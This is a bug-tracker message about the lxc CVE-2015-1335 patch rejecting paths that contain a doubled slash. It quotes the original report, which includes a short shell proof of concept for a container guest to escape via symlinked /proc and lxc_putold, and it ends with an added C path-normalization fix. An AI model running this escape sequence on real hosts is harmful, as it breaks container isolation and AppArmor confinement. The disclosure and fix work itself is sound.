The problem lies in the ubuntu patch http://archive.ubuntu.com/ubuntu/pool/main/l/lxc/lxc_1.0.7-0ubuntu0.5.debian.tar.gz
where this code

+ size_t start = croot ? strlen(croot) : 0;
+ if (strcmp(ws + start, target + start) != 0) {
+ ERROR("Mount onto %s resulted in %s\n", target, ws);
+ goto out;
+ }

in file 0003-CVE-2015-1335.patch checks if ws and start are the same.

According to the given error (which I forgot to paste above), ws and target ARE different:

lxc-start: utils.c: ensure_not_symlink: 1384 Mount onto /usr/lib/x86_64-linux-gnu/lxc//proc resulted in /usr/lib/x86_64-linux-gnu/lxc/proc

So target is /usr/lib/x86_64-linux-gnu/lxc//proc and ws is /usr/lib/x86_64-linux-gnu/lxc/proc.

Any hints how we could prevent the double slashing? Or would you just "clean up" the path somehow?

https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here). It then modifies mounts operating in guest root directory before invoking init.
  As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using a manipulated image) and then, when started again, guest may
  * Access the whole host root filesystem
  * Block switching from lxc-start apparmor profile to lxc-container-default

  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold
  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status

  The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
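One way to answer the question in the message above, as an added example that is not part of the original report or of the lxc patch: normalize both paths lexically (collapse repeated slashes, drop a trailing slash) before the strcmp from the patch, so the doubled slash seen in the error message no longer trips the check while a mount that really landed somewhere else still fails it. MAX_PATH_LEN, the function names and the extra prefix guard are assumptions of this example; the paths are the ones from the quoted error.

```c
#include <stdio.h>
#include <string.h>
#define MAX_PATH_LEN 4096   /* assumed buffer size; lxc itself uses PATH_MAX */

/* Lexically collapse runs of '/' and drop a trailing '/' ("/" stays "/").
 * Deliberately does not resolve symlinks or "..": the check exists to compare
 * the requested target with where the mount actually landed. */
int normalize_path(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        if (*p == '/' && n > 0 && out[n - 1] == '/')
            continue;                 /* skip the repeated slash */
        if (n + 1 >= outlen)
            return -1;                /* no room for this char plus NUL */
        out[n++] = *p;
    }
    if (n > 1 && out[n - 1] == '/')
        n--;                          /* "/a/b/" -> "/a/b" */
    out[n] = '\0';
    return 0;
}

/* The patch's comparison, applied to normalized copies. Returns 1 when the
 * mount landed on the requested target, 0 otherwise (including on error). */
int mount_landed_where_expected(const char *croot, const char *target, const char *ws)
{
    char ncroot[MAX_PATH_LEN] = "", ntarget[MAX_PATH_LEN], nws[MAX_PATH_LEN];
    if (croot && normalize_path(croot, ncroot, sizeof ncroot) != 0)
        return 0;
    if (normalize_path(target, ntarget, sizeof ntarget) != 0 ||
        normalize_path(ws, nws, sizeof nws) != 0)
        return 0;
    size_t start = croot ? strlen(ncroot) : 0;
    /* Extra guard not in the patch: both paths must really begin with croot,
     * otherwise "+ start" would step past the end of a shorter string. */
    if (strncmp(ntarget, ncroot, start) != 0 || strncmp(nws, ncroot, start) != 0)
        return 0;
    return strcmp(nws + start, ntarget + start) == 0;
}

int main(void)
{
    /* the two spellings from the quoted error message: same mount point */
    const char *croot = "/usr/lib/x86_64-linux-gnu/lxc";
    int ok = mount_landed_where_expected(croot, "/usr/lib/x86_64-linux-gnu/lxc//proc",
                                         "/usr/lib/x86_64-linux-gnu/lxc/proc");
    printf("normalized comparison: %s\n", ok ? "match" : "mismatch");
    return 0;
}
```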